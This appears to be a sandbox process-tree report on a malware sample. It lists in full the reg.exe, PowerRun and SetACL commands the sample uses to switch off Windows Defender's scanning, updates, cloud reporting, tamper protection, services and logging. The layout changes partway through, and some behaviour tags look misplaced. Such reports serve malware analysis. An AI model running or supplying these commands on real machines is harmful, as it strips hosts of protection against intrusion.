C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f7⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f7⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f7⤵PID:1604
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f7⤵PID:1220
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f7⤵PID:4824
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f7⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:2084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f7⤵PID:508
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f7⤵PID:5060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f7⤵PID:2696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f7⤵PID:3144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f7⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:2956
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f7⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f7⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f7⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f7⤵PID:3552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f7⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f7⤵PID:2884
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f7⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f7⤵PID:2692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f7⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender notification settings
PID:3312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f7⤵PID:4192
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exePowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:3100
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:2084
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4268 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:312
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 1108)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 3144)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 5064)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 1420)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 4816)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 4400)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 1864)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5036)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 5064)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 4552)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 508)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 2624)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 756)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 4208)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 5000)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 3132)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 4532)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 1864)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 4304)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 3860)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 1640)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 5060)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 3004)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 4140)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 4532)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 5000)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 1076)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5060)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe (depth 11, PID 1108)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 312)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 4304)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 1640)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\reg.exe (depth 10, PID 3356)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 3100)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 312)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 4184)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

C:\Windows\System32\reg.exe (depth 10, PID 4300)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe (depth 11, PID 1420)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 1980)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 2252)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    - Windows security modification

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 5064)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 744)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe (depth 11, PID 4512)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 2084)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 3584)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 3004)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

C:\Windows\System32\reg.exe (depth 10, PID 3904)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 2696)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 2996)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 4140)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 1864)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 4552)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 3840)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 2032)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 2464)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 4012)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 4640)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 4316)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 2996)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 7, PID 2956)
    PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 8, PID 316)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe (depth 9, PID 2084)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 4956)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7, PID 4560)
    Powershell -Command "Get-MpPreference"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7, PID 316)
    Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
    - Executes dropped EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7, PID 3144)
    Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')

C:\Windows\SysWOW64\cmd.exe (depth 6, PID 3724)
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do64.bat

C:\Windows\System32\Conhost.exe (depth 7, PID 1980)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 3840)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
    - Modifies Windows Defender Real-time Protection settings

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 2940)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 4464)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 1076)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
    - Executes dropped EXE
    - Windows security modification
    - Modifies data under HKEY_USERS

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 3228)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
    - Windows security modification

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 508)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 4140)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe (depth 7, PID 2996)
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
C:\Windows\SysWOW64\reg.exe (depth 7, PID 4856)
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4208)
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3860)
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
    - Modifies security service

C:\Windows\SysWOW64\reg.exe (depth 7, PID 744)
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 944)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2044)
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4316)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2464)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2932)
    reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2492)
